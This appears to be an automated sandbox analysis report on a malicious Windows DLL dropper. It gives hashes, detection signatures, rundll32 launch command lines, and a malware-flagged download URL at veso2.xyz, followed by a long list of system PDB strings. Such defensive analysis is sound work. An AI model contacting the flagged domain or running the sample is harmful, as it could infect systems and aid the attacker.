Analysis Report 4123.do1

Overview

General Information

Sample Name: 4123.do1 (renamed file extension from do1 to dll)
Analysis ID: 384021
MD5: f776deb4df137b37dcae5406c8f3a07a
SHA1: f6a31b594fca39c118927405fa4d14353b8fd49a
SHA256: 93cc5e6a6b671d9b0124ade32ae8b09269de9f03c5c5e66347fbfc7a8c3b305e

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Performs DNS queries to domains with low reputation
Rundll32 performs DNS lookup (likely malicious behavior)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
One or more processes crash
PE file contains strange resources
Uses 32bit PE files

Startup

  • System is w10x64
  • loaddll32.exe (PID: 7088 cmdline: loaddll32.exe 'C:\Users\user\Desktop\4123.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 7100 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7132 cmdline: rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 6652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1008 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7120 cmdline: rundll32.exe C:\Users\user\Desktop\4123.dll,DF1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1008 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5752 cmdline: rundll32.exe 'C:\Users\user\Desktop\4123.dll',DF1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5948 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 1008 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://veso2.xyz/campo/r/r1F | Avira URL Cloud: Label: malware
Source: http://veso2.xyz/campo/r/r1C: | Avira URL Cloud: Label: malware
Source: http://veso2.xyz/campo/r/r1 | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: veso2.xyz | VirusTotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: 4123.dll | VirusTotal: Detection: 55%
Source: 4123.dll | ReversingLabs: Detection: 62%
Source: 10.2.rundll32.exe.1190000.7.unpack | Avira: Label: TR/Dropper.Gen
Source: 3.2.rundll32.exe.11b0000.7.unpack | Avira: Label: TR/Dropper.Gen
Source: 10.2.rundll32.exe.d823b6.2.unpack | Avira: Label: TR/Dropper.Gen
Source: 4.2.rundll32.exe.11a0000.7.unpack | Avira: Label: TR/Dropper.Gen
Source: 4123.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Note: the four Avira hits on *.unpack regions are memory dumps of the rundll32.exe processes (process index.phase.image.base.region), i.e. the in-memory image after the DLL has unpacked, so these labels reflect the payload rather than the packed file on disk. The "Binary string: *.pdb" entries that follow are symbol-file names recovered from the WerFault.exe crash-handler memory of the three crashed rundll32 processes; they name standard Windows system DLLs and are not strings contributed by the sample.
Source: Binary string: cryptbase.pdbP source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdbY source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb6 source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.636944028.0000000003386000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.636727331.0000000002DD7000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642877334.00000000051BB000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000008.00000003.636702692.0000000003380000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.637261679.0000000002DD1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642507283.000000000337E000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb* source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb, source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbS source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb_ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbq source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.636714132.000000000338C000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.637048796.0000000002DDD000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642523716.000000000338A000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb} source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000008.00000003.641954637.00000000059C4000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb& source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb? source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb} source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb6 source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbt source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbh source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdbc source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbB source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbe source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: userenv.pdbe source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb? source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbh source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000008.00000003.636944028.0000000003386000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.643200294.0000000003384000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000008.00000002.658372686.00000000035C0000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.656286484.00000000009C0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.698870871.0000000003430000.00000002.00000001.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdbZ source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb\ source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbU source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb0 source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbW source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdbr source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb8 source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbI source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdbq source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: lbase.pdb source: WerFault.exe, 00000009.00000003.636822779.0000000004A2D000.00000004.00000001.sdmp
Source: Binary string: cryptsp.pdb{ source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdbS source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: WerFault.exe, 00000008.00000002.658372686.00000000035C0000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.656286484.00000000009C0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.698870871.0000000003430000.00000002.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.641954637.00000000059C4000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: combase.pdbD source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: combase.pdbF source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb{ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb* source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb8 source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbf source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: l32.pdb source: WerFault.exe, 00000009.00000003.636822779.0000000004A2D000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb5 source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdbN source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbr source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.636702692.0000000003380000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642507283.000000000337E000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb` source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb, source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbG source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdbe source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbx source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: winrnr.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbc source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb5 source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbf source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbY source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb> source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdbL source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb~ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb, source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
